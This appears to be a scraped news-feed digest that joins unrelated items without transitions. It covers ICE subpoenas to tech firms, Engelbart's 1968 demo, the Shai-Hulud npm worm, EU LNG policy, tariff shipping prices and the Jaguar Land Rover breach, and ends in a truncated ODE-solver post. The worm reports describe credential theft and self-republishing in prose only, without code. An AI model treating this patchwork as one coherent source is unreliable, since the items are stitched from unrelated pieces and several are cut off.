“Subpoenas can easily be used and the person never knows,” Nash told The Intercept. “It’s problematic to have a situation in which people who are targeted by these subpoenas don’t have an opportunity to vindicate their rights.”
Google declined to discuss the specifics of the subpoenas, but the company said administrative subpoenas like these do not include facts about the underlying investigation.
“Our processes for handling law enforcement subpoenas are designed to protect users’ privacy while meeting our legal obligations,” said a Google spokesperson in an emailed statement. “We review every subpoena and similar order for legal validity, and we push back against those that are overbroad or improper, including objecting to some entirely.”
ICE agents sent the administrative subpoenas to Google and Meta by invoking a
broad legal provision
that gives immigration officers authority to demand documents “relating to the privilege of any person to enter, reenter, reside in, or pass through the United States.”
One recent
study based on ICE records
found agents invoke this same provision hundreds of times each year in administrative subpoenas to tech companies. Another
study
found ICE’s subpoenas to tech companies and other private entities “overwhelmingly sought information that could be used to locate ICE’s targets.”
Unlike search warrants, administrative subpoenas like these do not require a judge’s signature or probable cause of a crime, which means they are ripe for abuse.
Silicon Valley’s willingness to accommodate these kinds of subpoenas puts those who speak out at greater risk.
HSI had flagged Taal to the State Department following “targeted analysis to substantiate aliens’ alleged engagement of antisemitic activities,” according to an
affidavit
later filed in court by a high-ranking official. This analysis amounted to a trawl of online articles about Taal’s
participation in Gaza protests
and run-ins with the Cornell administration. The State Department revoked Taal’s visa, and ICE agents in upstate New York began searching for him.
In mid-March, the week after Mahmoud Khalil was arrested in New York City, Taal
sued the Trump administration
, seeking an injunction that would have blocked ICE from detaining him too. By this point, he and Thomas-Johnston had both left their campus housing at Cornell and were hiding from ICE in a house 10 miles outside Ithaca.
Two days after Taal filed his suit, still unable to track him down, ICE sent an administrative subpoena to Meta. According to notices Meta emailed to Taal, the subpoena sought information about his Instagram and Facebook accounts. Meta gave Taal 10 days to challenge the subpoena in court before the company would comply and hand over data about his accounts to ICE.
Like Google, Meta declined to discuss the subpoena it received about Taal’s account, referring The Intercept to a
webpage
about the company’s compliance with data demands.
A week later, HSI sent another administrative subpoena to Google regarding Taal’s Gmail account, according to a notice Google sent him the next day.
“It was a phishing expedition,” Taal said in a text message to The Intercept.
After Taal decided to leave the country and dismissed his lawsuit in April, ICE withdrew its subpoenas for his records.
But on the last day of March, HSI sent yet another subpoena, this one to Google for information about Thomas-Johnson’s Gmail account. Without giving Thomas-Johnston any advance warning or the opportunity to challenge it, Google complied with the subpoena, and it only notified him weeks later.
“Google has received and responded to legal process from a Law Enforcement authority compelling the release of information related to your Google Account,” read an email Google sent him in early May.
By this point, Thomas-Johnston had already left the country too. He fled after a friend was detained at the Tampa airport, handed a note with Thomas-Johnston’s name on it, and asked repeatedly about his whereabouts, he told The Intercept.
Thomas-Johnston’s lawyer, who also represented Taal, reached out to an attorney for Google about the demand for his client’s account information.
“Google has already fulfilled this subpoena,” Google’s attorney replied by email, further explaining that Google’s “production consisted of basic subscriber information,” such as the name, address, and phone number associated with the account. Google did not produce “the contents of communications, metadata regarding those communications, or location information,” the company’s attorney wrote.
“This is the extent that they will go to be in support of genocide,” Taal said of the government’s attempts to locate him using subpoenas.
Douglas Engelbart's 1968 "Mother of All Demos" at SRI showcased interactive computing innovations, including the mouse debut, hypertext, real-time editing, and collaborative tools, envisioning augmented human intellect.
STATEMENTS
The Augmented Human Intellect Research Center at Stanford Research Institute has pursued computer systems that enhance intellectual work by providing instant responsiveness to user actions throughout the day.
The demo features a computer mouse that controls a tracking spot on a networked display, allowing seamless interaction with text and graphics.
Users can create and manipulate entities like statements and words, including operations such as copying, moving, and reorganizing content in real-time.
Hypertext linking enables jumping between files, such as connecting a text list to a visual map for contextual information like overdue books.
Shared-screen collaboration allows remote participants to view and point to the same display, with audio coupling for discussion, while reserving primary control to the host.
Video integration permits seeing the collaborator's face during work, enhancing remote teamwork through live feeds from the laboratory.
An upcoming ARPA computer network will connect experimental systems, enabling low-latency responses across distances, like from Cambridge to Menlo Park.
The network aims to provide services for managing information, such as locating available resources, protocols, and documents in a distributed environment.
IDEAS
A computer system alive all day, instantly responsive to every action, could dramatically amplify an intellectual worker's productivity and value creation.
Naming the input device a "mouse" was arbitrary but stuck, highlighting how simple conventions can endure in technological evolution.
Starting projects with a blank digital canvas mirrors traditional paper, but enables immediate entity creation and error correction without physical waste.
Copying and moving groups of statements or words allows fluid reorganization of information, turning chaotic lists into structured outputs like categorized produce.
Hypertext links transform static files into interconnected webs, where pointing to an element reveals layered details, such as a route map tied to tasks.
Collaborative "bug fights" let multiple users argue over content in real-time, with hierarchical control ensuring productive discourse without chaos.
Integrating audio, video, and shared screens creates a virtual blackboard, where control can be passed like handing over chalk in a physical meeting.
Future networks could democratize access to computing power, allowing seamless demos from distant locations like Boston conferences.
Organizing network information—tracking services, protocols, and availability—poses a novel challenge for applying augmented tools to infrastructure itself.
The demo's innovations foreshadow a world where human intellect is augmented not replaced, emphasizing partnership between people and machines.
INSIGHTS
True augmentation of human intellect lies in tools that extend cognitive capabilities seamlessly, turning individual work into collective, networked intelligence without overwhelming the user.
Interactive computing fundamentals, like the mouse and hypertext, reveal that intuitive interfaces can unlock exponential productivity by mimicking natural thought processes.
Collaborative systems with shared views and controls highlight how technology can bridge distances, fostering real-time human connection akin to in-person ideation.
The persistence of simple innovations, such as device naming or basic editing, underscores that foundational user experiences drive long-term technological adoption and evolution.
Envisioning networks as information ecosystems suggests that managing metadata about systems themselves will be as crucial as the systems, enabling scalable human flourishing in digital realms.
QUOTES
"If in your office you as an intellectual worker were supplied with a computer display backed up by a computer that was alive for you all day and was instantly responsive to every action you had how much value could you drive from that."
"I don't know why we call it a mouse sometimes I apologize it started that way and we never did change it."
"This characterizes the way I could sit here and look at a blank piece of paper that's the way I start many projects so with my system that's a good start."
"Yeah that's they call a bug fight so we set up now audio coupling and we're both looking at the same display and that'd be very handy to work we can talk to each other in point."
"I'd like to see you while I'm working on it and we're going to go for a picture down in our laboratory in Menlo Park and pipe it up come in Menlo Park."
HABITS
Begin intellectual projects by loading a blank digital canvas, akin to starting with a blank sheet of paper, to foster initial idea generation.
Use immediate error correction during text input, such as backing up to fix mistakes, to maintain workflow momentum.
Reorganize information dynamically by copying, moving, and grouping elements, like sorting lists into categories for clarity.
Engage in real-time collaboration by pointing and discussing shared displays, reserving primary control while allowing input from others.
Integrate visual and audio cues in remote work, such as viewing a collaborator's face, to enhance interpersonal connection during tasks.
FACTS
The December 9, 1968, demo at SRI introduced the computer mouse publicly for the first time.
Engelbart's team demonstrated hypertext linking, allowing navigation between related files and visuals.
The system featured real-time text editing with multiple windows and flexible view controls on cathode ray tube displays.
Shared-screen teleconferencing was shown with a remote participant in Menlo Park interacting via a less powerful "bug."
The ARPA network, precursor to the internet, was planned to connect about 20 experimental computers within a few years.
REFERENCES
Augmented Human Intellect Research Center at Stanford Research Institute (SRI).
ARPA computer network (experimental, first form in about a year, expanding to 20 computers).
On-Line System (NLS), implied in the demo's text editing and linking tools.
Picture drawing capability for maps and routes in the system.
HOW TO APPLY
Acquire or simulate an interactive display system that responds instantly to inputs, starting with basic mouse-like controls to manipulate digital entities like text.
Begin tasks by creating a blank workspace and inputting initial statements or words, using copy and move commands to build and iterate on ideas rapidly.
Implement hypertext links by associating text elements with external files or visuals, such as linking a task list to a route map for contextual depth.
Set up shared-screen collaboration with audio, designating one user as primary controller while allowing others to point and comment in real-time.
Prepare for networked environments by developing tools to track and organize meta-information, like service availability and protocols, to facilitate distributed work.
ONE-SENTENCE TAKEAWAY
Embrace augmented intellect tools to multiply human productivity through intuitive, collaborative computing interfaces.
RECOMMENDATIONS
Invest in responsive digital tools that mimic natural cognition to boost daily intellectual output.
Prioritize hierarchical controls in collaborative software to enable efficient "bug fights" without conflict.
Build interconnected systems with hypertext to reveal hidden layers of information intuitively.
Integrate multimedia—audio, video, and shared views—for remote work that feels as natural as face-to-face.
Design future networks with built-in information services to streamline access to resources and expertise.
MEMO
In the flickering glow of a cathode ray tube on December 9, 1968, Douglas Engelbart and his team at Stanford Research Institute unveiled a vision that would redefine human-computer interaction. Dubbed the "Mother of All Demos," the presentation introduced the world to the computer mouse—a wooden prototype that guided a tracking spot across the screen with uncanny precision. Engelbart, ever the visionary, demonstrated not just hardware but a philosophy: augmenting human intellect through systems that respond instantly to every keystroke and gesture. He loaded blank digital canvases, manipulated words and statements with copy-paste fluidity, and reorganized chaotic lists into tidy categories, all while pondering aloud, "How much value could you drive from that?" This wasn't mere tinkering; it was a blueprint for intellectual workers empowered by alive, all-day computing.
The demo's magic deepened with collaboration across distances. From Menlo Park, a remote colleague joined via shared screen, their weaker "bug" pointing to Engelbart's text while audio lines crackled with discussion. What ensued was a "bug fight"—a lively argument over content, with Engelbart retaining ultimate control, much like a teacher wielding the chalk. Video feeds soon piped in the collaborator's face, transforming the abstract into the intimate, as if they shared a laboratory blackboard. Engelbart jumped through hypertext links, weaving text to maps: a grocery list bloomed into a route plan, revealing overdue books at the library. These feats foreshadowed networked futures, with the ARPA system on the horizon to link 20 computers, delivering Cambridge-speed responses and meta-services for protocols and papers.
Engelbart's legacy endures in our touchscreen world, reminding us that technology's highest purpose is partnership, not replacement. By organizing information as dynamically as thought itself, his innovations promised—and delivered—a era where human flourishing accelerates through seamless augmentation. The mouse may have started as a whim, but it scurried into history, proving that small inventions can bootstrap vast intellectual leaps.
Like this? Create a free account to export to PDF and ePub, and send to Kindle.
At least 187 code packages made available through the JavaScript repository NPM have been infected with a self-replicating worm that steals credentials from developers and publishes those secrets on GitHub, experts warn. The malware, which briefly infected multiple code packages from the security ve...
At least 187 code packages made available through the JavaScript repository
NPM
have been infected with a self-replicating worm that steals credentials from developers and publishes those secrets on
GitHub
, experts warn. The malware, which briefly infected multiple code packages from the security vendor
CrowdStrike
, steals and publishes even more credentials every time an infected package is installed.
The novel malware strain is being dubbed
Shai-Hulud
— after the name for the giant sandworms in Frank Herbert’s
Dune
novel series — because it publishes any stolen credentials in a new public GitHub repository that includes the name “Shai-Hulud.”
“When a developer installs a compromised package, the malware will look for a npm token in the environment,” said
Charlie Eriksen
, a researcher for the Belgian security firm
Aikido
. “If it finds it, it will modify the 20 most popular packages that the npm token has access to, copying itself into the package, and publishing a new version.”
At the center of this developing maelstrom are code libraries available on
NPM
(short for “Node Package Manager”), which acts as a central hub for JavaScript development and provides the latest updates to widely-used JavaScript components.
The Shai-Hulud worm emerged just days after unknown attackers
launched a broad phishing campaign
that spoofed NPM and asked developers to “update” their multi-factor authentication login options. That attack led to malware being inserted into at least two-dozen NPM code packages, but the outbreak was quickly contained and was narrowly focused on siphoning cryptocurrency payments.
Image: aikido.dev
In late August, another compromise of an NPM developer resulted in malware being added to “
nx
,” an open-source code development toolkit with as many as six million weekly downloads. In the nx compromise, the attackers introduced code that scoured the user’s device for authentication tokens from programmer destinations like GitHub and NPM, as well as SSH and API keys. But instead of sending those stolen credentials to a central server controlled by the attackers, the malicious nx code created a new public repository in the victim’s GitHub account, and published the stolen data there for all the world to see and download.
Last month’s attack on nx did not self-propagate like a worm, but this Shai-Hulud malware does and bundles reconnaissance tools to assist in its spread. Namely, it uses the open-source tool
TruffleHog
to search for exposed credentials and access tokens on the developer’s machine. It then attempts to create new GitHub actions and publish any stolen secrets.
“Once the first person got compromised, there was no stopping it,” Aikido’s Eriksen told KrebsOnSecurity. He said the first NPM package compromised by this worm appears to have been altered on Sept. 14, around 17:58 UTC.
The security-focused code development platform
socket.dev
reports
the Shai-Halud attack briefly compromised at least 25 NPM code packages managed by CrowdStrike. Socket.dev said the affected packages were quickly removed by the NPM registry.
In a written statement shared with KrebsOnSecurity, CrowdStrike said that after detecting several malicious packages in the public NPM registry, the company swiftly removed them and rotated its keys in public registries.
“These packages are not used in the Falcon sensor, the platform is not impacted and customers remain protected,” the statement reads, referring to the company’s widely-used endpoint threat detection service. “We are working with NPM and conducting a thorough investigation.”
A
writeup on the attack
from
StepSecurity
found that for cloud-specific operations, the malware enumerates AWS, Azure and Google Cloud Platform secrets. It also found the entire attack design assumes the victim is working in a Linux or macOS environment, and that it deliberately skips Windows systems.
StepSecurity said Shai-Hulud spreads by using stolen NPM authentication tokens, adding its code to the top 20 packages in the victim’s account.
“This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user,” StepSecurity’s
Ashish Kurmi
wrote.
Eriksen said Shai-Hulud is still propagating, although its spread seems to have waned in recent hours.
“I still see package versions popping up once in a while, but no new packages have been compromised in the last ~6 hours,” Eriksen said. “But that could change now as the east coast starts working. I would think of this attack as a ‘living’ thing almost, like a virus. Because it can lay dormant for a while, and if just one person is suddenly infected by accident, they could restart the spread. Especially if there’s a super-spreader attack.”
Nicholas Weaver
is a researcher with the
International Computer Science Institute
, a nonprofit in Berkeley, Calif. Weaver called the Shai-Hulud worm “a supply chain attack that conducts a supply chain attack.” Weaver said NPM (and all other similar package repositories) need to immediately switch to a publication model that requires explicit human consent for every publication request using a phish-proof 2FA method.
“Anything less means attacks like this are going to continue and become far more common, but switching to a 2FA method would effectively throttle these attacks before they can spread,” Weaver said. “Allowing purely automated processes to update the published packages is now a proven recipe for disaster.”
Team-Wide VMware Certification: Your Secret Weapon for Security
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 15:01:11
One VMware-certified pro is a win. An entire certified team? That's a security multiplier. VMUG Advantage makes team-wide certification practical—building collaboration, resilience, and retention. [...]...
When one person on your IT team is VMware certified, that’s a win.
But when your entire team is certified? That’s a force multiplier for innovation, retention, and your security posture.
Organizations that invest in
team-wide certification
build high-performing environments that are more collaborative, secure, and future-ready. The result: smoother rollouts, fewer errors, faster incident response, and a workforce that’s
confident, capable, and committed
.
Certification Is a Security Strategy
It’s easy to think of certifications as personal goals, but leading organizations see them as an investment with real business outcomes.
Certified teams:
Share a common language for architecture and design
Understand how to properly configure and harden virtual environments
Minimize misconfigurations, a leading cause of security incidents
Quickly identify and remediate vulnerabilities before they escalate
VMware certifications cover a broad portfolio of products critical to modern infrastructure,
including vSphere, NSX, vSAN, and VMware Cloud Foundation
.
With certification, your team doesn’t just learn how to deploy them, they learn how to do it
securely and at scale
.
Why vSphere Expertise Matters for Security
Among VMware’s offerings,
vSphere
stands out as a cornerstone for both virtualization and security. Beyond consolidating workloads, it equips teams with built-in security tools and practices that can harden infrastructure against threats.
With vSphere certification, IT professionals gain the expertise to:
Enforce role-based access control
to prevent privilege creep
Leverage
vSphere Trust Authority
for Security to validate hosts and ensure a secure chain of trust
Use
VM Encryption
and
secure boot
to protect data and workloads
Automate patching with
vSphere Lifecycle Manager
, reducing exposure to known vulnerabilities
Security isn’t bolted onto vSphere, it’s woven into the platform. Certification ensures your team not only knows these features exist but knows how to implement them effectively.
Certification as Leadership Development
“My effectiveness as a leader comes from having walked the walk.”
— Tamecka McKay, VMUG Board Director
Tamecka McKay’s career journey from learning ESX 3.5 to leading enterprise infrastructure illustrates the transformative power of community and certification. For McKay,
certifications aren’t just personal wins; they’re tools that elevate entire teams
.
She emphasizes that security and trust start with capability:
“When your team is trained and confident in VMware’s platforms, you’re prepared to build secure, trusted infrastructure. Certification creates that confidence and competence.”
For organizations aiming to grow secure leaders from within, team-wide VMware certification is a foundational step.
A Talent Retention Strategy That Actually Works
In today’s competitive IT landscape, professional growth is one of the top reasons employees stay or leave. Offering VMware certification shows your team you're invested in their future and gives them meaningful, marketable skills which leads to:
Higher job satisfaction
Stronger team loyalty
Lower turnover and recruitment costs
And when employees feel empowered, your entire organization benefits.
Scale Smart with VMUG Advantage
Scaling certification across an entire IT team doesn’t have to be cost-prohibitive.
VMUG Advantage
makes it practical and affordable
with group licensing and volume discounts that include:
Hands-on labs for practicing secure deployments
Exam vouchers to streamline the certification process
Personal-use licenses for real-world testing
Access to a community of VMware experts for ongoing mentorship
EU Energy Commissioner Dan Jorgensen met US Energy Secretary Chris Wright in Brussels on 11 September.
Following her
State of the European Union
address to the European Parliament last week, EU Commission President Ursula von der Leyen got an earful from MEPs angry about her “
surrender deal
” with Donald Trump. Iratxe Garcia Perez, leader of the centre-left S&D group, blasted von der Leyen’s hypocrisy in calling for Europe to have courage and fight when she herself showed no courage with Trump. "You went to Scotland to bury Europe's strategic autonomy under a golf course,” she told her.
Green group leader Bas Eickhout questioned how she could say in her speech she still cares deeply about climate change, even as she and her EPP group have spent the first ten months of her second term
dismantling
some of the climate legislation she passed in her first term. “You said we need to be energy independent, but at the same time you sign a Trump deal that promises a $750 billion investment in American [LNG] energy that is dirtier than what we had before. That to replace the Russian LNG gas that is only $10 billion per year for now. These numbers don’t add up…We should invest this money in European renewables and European industry, because renewables are the worst enemy of fossil autocrats.”
The Commission has defended President von der Leyen’s promise to invest $250 billion per year in US liquified natural gas (LNG) for the remainder of Trump’s term (something analysts say
isn’t possible
to fully deliver) by saying it is just a temporary measure until this can be replaced by renewables in the next decade. But energy analysts have pointed out that
building the infrastructure
needed to receive the American LNG will lock Europe into long-term dependence. Last week, US Energy Secretary Chris Wright said in an interview with Euractiv that this is exactly the point.
Contradicting the Commission’s claims that this use of US LNG will be a “
short-term measure
,” Wright told Euractiv that it is in fact a “
long-term change
.” “When you buy energy, particularly liquefied natural gas, there’s a huge amount of infrastructure that’s built,” he said. “This isn’t going to be three and a half years and it’ll all be over.”
It’s an important distinction because it will only be possible for the EU to meet its target of reducing emissions by 55% by 2030 and to net zero by 2050 if the use of US LNG is short term. But Wright is right, it doesn’t make sense that Europe would build all of the expensive infrastructure necessary to receive US LNG at its ports and then just stop using it a few years later.
Wright, who was on a visit to Brussels to plan the fossil-fuel-dumping bonanza with EU lawmakers, also dismissed analysts’ claims that the US will not be able to deliver this amount of LNG over the next three years. “During the Trump administration the capacity for the United States to export LNG will double, not increase by 10 or 20 percent,” Wright told Euractiv.
At the time of Russia’s invasion of Ukraine, when the EU urgently switched from importing Russian pipeline gas to importing liquified gas from the US and other suppliers, most US export terminals and EU import terminals
were operating at maximum capacity
, and those that are not were not didn’t have the pipeline infrastructure to get the gas to where it needs to go. New port terminals and pipelines have been rapidly built after President von der Leyen
agreed with President Biden
in 2022 to immediately redirect 15 billion cubic metres (bcm) of US LNG to the EU to help replace the 100bcm of Russian gas the EU stopped importing. That was successfully done. But the plan also called for scaling this up to 50bcm of US LNG per year starting in 2023. That hasn’t happened, for two reasons: the needed export and import infrastructure takes time to build, and market interest has been limited because EU gas demand has actually fallen recently.
To receive more US LNG the US needs to build liquefication export terminals, and the EU needs to build gasification import terminals and pipelines at either end to get the gas to and from where it needs to go. So the problem is that by their very nature, a surge of LNG imports cannot be temporary. Receiving them will require a huge amount of expensive port and pipeline infrastructure to be built, and once it’s built it needs to continue to be used for decades in order to justify the investment. In other words, US LNG
can’t
be short term, it can’t only be long term.
“A big LNG import terminal takes around five years to build and come online,” Simon Dekeyrel, a climate and energy analyst at the European Policy Centre,
told me
in 2022. The pipelines connecting that terminal also take several years to build – well beyond the short-term urgency of replacing Russian gas imports. “What we’re seeing right now is a flurry of new announced projects across EU member states. Germany has announced two LNG import terminals. Italy is also considering a new terminal. It’s a huge rush…which might really lead to unnecessary investments in fossil fuel infrastructure which would be much better spent elsewhere.”
The deal’s
defenders
have insisted that this is an empty promise that can’t actually be delivered so it’s harmless. But the US government has made it clear they don’t see this as a mere symbolic tribute that doesn’t require delivery. They have said that if the EU doesn’t start coughing up the big bucks right away, then the deal limiting tariffs to 15% is off. Europe has to at least start building the infrastructure necessary to receive the US gas, or risk Trump’s wrath.
The argument by the deal’s defenders that this investment is necessary to ween Europe off of Russian energy also doesn’t carry water because Europe has already done so (there is only a little importing still going on, which must be phased out by 2027). A
report
by the Brussels think tank Bruegel has found that Europe doesn’t need the US gas it has committed to buying.
The EU’s faster-than-expected switch to renewables has meant that gas need is going down. In 2024, overall LNG imports to the EU (of which the US makes up 50%) declined compared to the previous year, which left some of the European gasification terminals that have been quickly built in Germany since 2022 underutilised for the first time. Warmer winters due to climate change and the surge in new renewables meant the LNG wasn’t needed.
Europeans can see how the US government is weaponising Europe’s dependencies at the moment. Von der Leyen even
obliquely referenced it
in her State of the Union speech. Why then would Europeans be so quick to increase their dependence on the US when it comes to energy? Were no lessons learned about the over-reliance on Russian energy over the past two decades? In five years, after spending billions on port terminals and pipelines to receive US gas and dropping investment in renewables, the EU could find itself far more dependent on American energy than it ever was on Russian energy.
The EU is backing away from its Green Deal, as concerns over near-term security threats overshadow the long-term threat of climate change. But some argue today's reframing will help climate efforts.
Discussion about this post
Another npm supply-chain attack
Linux Weekly News
lwn.net
2025-09-16 14:51:53
The Socket.dev blog describes
this week's attack on JavaScript packages in the npm repository.
A malicious update to @ctrl/tinycolor (2.2M weekly
downloads) was detected on npm as part of a broader supply chain
attack that impacted more than 40 packages spanning multiple
maintainers.
The com...
A malicious update to
@ctrl/tinycolor
(2.2M weekly
downloads) was detected on npm as part of a broader supply chain
attack that impacted more than 40 packages spanning multiple
maintainers.
The compromised versions include a function
(
NpmModule.updatePackage
) that downloads a package
tarball, modifies
package.json
, injects a local script
(
bundle.js
), repacks the archive, and republishes it,
enabling automatic trojanization of downstream packages.
Security updates for Tuesday
Linux Weekly News
lwn.net
2025-09-16 14:36:12
Security updates have been issued by AlmaLinux (kernel and kernel-rt), Debian (node-sha.js and python-django), Fedora (chromium, cups, exiv2, perl-Catalyst-Authentication-Credential-HTTP, perl-Catalyst-Plugin-Session, perl-Plack-Middleware-Session, and qemu), Red Hat (container-tools:rhel8, podman, ...
Some international sellers on large platforms like eBay and Etsy have jacked up their shipping costs to the United States to absurd prices in order to deter Americans from buying their products in an effort to avoid dealing with the
logistical headaches of Trump's tariffs
.
A Japanese eBay seller increased the shipping cost on a
$319 Olympus camera lens to $2,000 for U.S. buyers, for example
. The shipping price from Japan to the United Kingdom, Italy, Ireland, Costa Rica, Canada, and other countries I checked is $29, meanwhile. The seller, Ninjacamera.Japan, recently updated their shipping prices to the United States to all be $2,000 for dozens of products that don't weigh very much and whose prices are mostly less than $800. That price used to be the threshold for the de minimis tariff exemption, a rule that previously allowed people to buy things without paying tariffs on lower-priced goods.
As many hobbyists have recently discovered
, the end of de minimis has made things more expensive and harder to come by.
eBay does allow sellers to opt out of selling to the United States entirely, but some sellers have found it easier to modify existing listings to have absurd shipping prices for the United States only rather than deal with taking entire listings down and delisting them to restrict American buyers entirely.
I found numerous listings from a handful of different sellers who, rather than say they won't ship to the United States, have simply jacked up their shipping costs to absurd levels for the United States only. There are $575 cameras that the seller is now charging $500 to ship to the United States but
will mail for free anywhere else in the world
. Another Japanese seller is charging $640 to mail to the United States but
will ship for free to other countries
. A seller in Kazakhstan is charging $35 to mail a camera internationally but $999 to send to the United States. A
German yarn seller
is charging $10.50 to ship to Canada, but $500 to ship to the United States.
On Reddit
, users are reporting the same phenomenon occurring with
some sellers on Etsy as well
(it is harder to search Etsy by shipping prices, so I couldn’t find too many examples of this).
What is happening here, of course, is that some sellers in other countries don't want to have to deal with Trump's tariffs and the complicated logistics they have created for both buyers and sellers. Many international shipping companies have entirely stopped shipping to the United States, and many international sellers don't want to have to deal with the hassle of changing whatever shipping service they normally use to accommodate American buyers. eBay has also warned sellers that they may get negative feedback from American buyers who do not understand how tariffs work. eBay's feedback system is very important, and just a few negative reviews can impact a seller's standing on the platform and make it less likely that buyers will purchase something from them.
None of this is terribly surprising, but as an American, it feels actually more painful to see a listing for a product I might want that costs $2,000 for shipping rather than have the listings be invisible to me altogether.
About the author
Jason is a cofounder of 404 Media. He was previously the editor-in-chief of Motherboard. He loves the Freedom of Information Act and surfing.
Morning Spew: Go to Red Hook to Heckle Some Oil and Gas Execs
Have you been listening to the Hell Gate Podcast? You can catch last week's episode
here
.
At the multidisciplinary Red Hook art space Pioneer Works last Friday evening, guests mingled as they viewed the new installations that will adorn the space for the rest of the year. The Mexican artist Raúl de Nieves's
towering stained glass windows
make the former iron factory feel like a kind of hippie church, but the bulk of what's on display is the exhibit "
How To Get To Zero
"—the first survey of the past half-decade of work from long-time collaborators Australian enviro-artist Tega Brain and New York City-based hacker-artist
Sam Lavigne
. One of the pieces is a video installation for "
Coppelganger
," which allows you to find the NYPD officer you look most like, a gamified reversal of ubiquitous surveillance; another is a matrix of bots hosted on a bunch of old, plugged-in smartphones, fixed to the wall and operating on their own, all running up the pageviews on climate news coverage. The overall effect is a pleasant feeling that you're hacking into the mainframe, finding glimpses of political possibility that both defy and sometimes reinforce the conventional wisdom that "we're so cooked."
But the main highlight is "Offset," Brain's and Lavigne's new, (sort of) satirical send-up of the idea of carbon offsets, the measly market-based answer to the generational problems presented by climate change. On
a website
built for "Offset," Lavigne and Brain offer visitors the chance to buy $150 certificates that would, in a roundabout way, cancel out carbon emissions by donating to activists that have been undertaking acts of sabotage against oil and gas infrastructure projects such as the Dakota Access Pipeline (included in the "marketplace" of industrial sabotage efforts is also the killing of UnitedHealthcare CEO Brian Thompson).
The in-person component of "Offset" is akin to a call center combined with an alternate reality game, where you can get on a leaderboard by logging the longest calls made to oil and gas executives, reducing your own private carbon footprint by, well, being annoying. It was a good way to spend an evening.
Hell Gate spoke to Lavigne about "Offset," which forms the centerpiece of his and Brain's contributions to the new Pioneer Works season.
This interview has been lightly edited and condensed for clarity.
Jaguar Land Rover extends shutdown after cyberattack by another week
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 14:08:16
Jaguar Land Rover (JLR) announced today that it will extend the production shutdown for another week, following a devastating cyberattack that impacted its systems at the end of August. [...]...
Jaguar Land Rover (JLR) announced today that it will extend the production shutdown for another week, following a devastating cyberattack that impacted its systems at the end of August.
JRL is a standalone entity under Tata Motors India, following its acquisition from Ford in 2008. JLR employs approximately 39,000 people, makes more than 400,000 vehicles each year, and has reported an annual revenue of over $38 billion (£29 billion).
The British automaker has been working to resume operations since it
disclosed the attack
on September 2, stating that its production had been significantly disrupted. Last week, JLR also confirmed that the attackers
stole "some data
" during the breach and instructed staff not to report to work.
Earlier today, the automotive giant announced that it's still working to restart its operations and that production will not resume until next week.
"Today we have informed colleagues, suppliers and partners that we have extended the current pause in our production until Wednesday 24th September 2025,"
JLR said
.
"We have taken this decision as our forensic investigation of the cyber incident continues, and as we consider the different stages of the controlled restart of our global operations, which will take time."
JLR has yet to reply to a request for comment from BleepingComputer regarding the incident and its potential impact on customers.
While the automaker confirmed the threat actors stole information from its network, it has yet to attribute the breach to a specific cybercrime group, and no known ransomware operation has taken responsibility for the attack.
However, a group of cybercriminals identifying as "Scattered Lapsus$ Hunters" has taken responsibility for the cyberattack, posting screenshots of an internal JLR SAP system on a Telegram channel and stating that they've also deployed ransomware on the company's compromised systems.
This cybercrime group claims to consist of cybercriminals associated with the Scattered Spider, Lapsus$, and ShinyHunters extortion groups. Scattered Lapsus$ Hunters also claimed responsibility for recent
Salesforce data theft attacks
.
Mullvad has begun rolling out a new feature that hides WireGuard connections inside QUIC traffic, a technique designed to help users slip past aggressive censorship systems.
By making VPN traffic look more like ordinary encrypted browsing, the update gives people in tightly controlled regions, including Russia and China, a better chance of maintaining stable access to the internet.
It also helps with accessing websites that are increasingly trying to ban VPNs.
The addition comes as Mullvad prepares to move away from OpenVPN, which it will no longer support starting January 2026.
With that change on the horizon, the company is putting its weight behind WireGuard while also making sure it remains usable in countries where standard WireGuard connections are heavily throttled or blocked.
QUIC itself is not new. Originally created by Google and now the backbone of HTTP/3, the protocol is prized for its speed, ability to handle multiple streams of data at once, and resilience against network issues.
Services like YouTube already rely on it, making QUIC traffic extremely common. Mullvad takes advantage of that by wrapping WireGuard’s UDP packets inside QUIC, effectively disguising VPN usage as something indistinguishable from normal web activity.
To make this possible, Mullvad has turned to MASQUE, a standard that allows UDP traffic to be tunneled through HTTP/3 connections.
The result is traffic that appears identical to everyday browsing, far harder for censors to single out and shut down.
The feature is included in Mullvad’s desktop apps for Windows and macOS beginning with version 2025.9.
Users can activate it in the VPN settings, though if multiple connection attempts fail, the client will automatically switch over to QUIC on its own. Support for Android and iOS devices is also planned.
Different VPN companies are taking different routes to achieve similar goals. Proton VPN relies on its Stealth protocol, which disguises WireGuard traffic inside TLS.
NordVPN recently introduced NordWhisper, its own censorship-resistant system. Meanwhile, Surfshark scrambles OpenVPN packets through its Camouflage mode, and ExpressVPN has long integrated obfuscation directly into its OpenVPN connections.
As governments expand online restrictions, VPN providers are steadily introducing new tactics to help users stay connected.
Implicit Ode Solvers Are Not Universally More Robust Than Explicit Ode Solvers
A very common adage in ODE solvers is that if you run into trouble with an explicit method, usually some explicit Runge-Kutta method like RK4, then you should try an implicit method. Implicit methods, because they are doing more work, solving an implicit system via a Newton method having “better” stability, should be the thing you go to on the “hard” problems.
This is at least what I heard at first, and then I learned about edge cases. Specifically, you hear people say “but for hyperbolic PDEs you need to use explicit methods”. You might even intuit from this “PDEs can have special properties, so sometimes special things can happen with PDEs… but ODEs, that should use implicit methods if you need more robustness”. This turns out to not be true, and really understanding the ODEs will help us understand better why there are some PDE semidiscretizations that have this “special cutout”.
What I want to do in this blog post is more clearly define what “better stability” actually means, and show that it has certain consequences that can sometimes make explicit ODE solvers actually more robust on some problems. And not just some made-up problems, lots of real problems that show up in the real world.
A Quick Primer on Linear ODEs
First, let’s go through the logic of why implicit ODE solvers are considered to be more robust, which we want to define in some semi-rigorous way as “having a better chance to give an answer closer to the real answer”. In order to go from semi-rigorous into a rigorous definition, we can choose a test function, and what better test function to use than a linear ODE. So let’s define a linear ODE:
$$u’ = \lambda u$$
is the simplest ODE. We can even solve it analytically, $u(t) = \exp(\lambda t)u(0)$. For completeness, we can generalize this to a linear system of ODEs, where instead of having a scalar $u$ we can let $u$ be a vector, in which case the linear ODE has a matrix of parameters $A$, i.e.
$$u’ = Au$$
In this case, if $A$ is diagonalizable, $A = P^{-1}DP$, then we can replace $A$:
$$u’ = P^{-1}DP u$$
$$Pu’ = DPu$$
or if we let $w = Pu$, then
$$w’ = Dw$$
where $D$ is a diagonal matrix. This means that for every element of $w$ we have the equation:
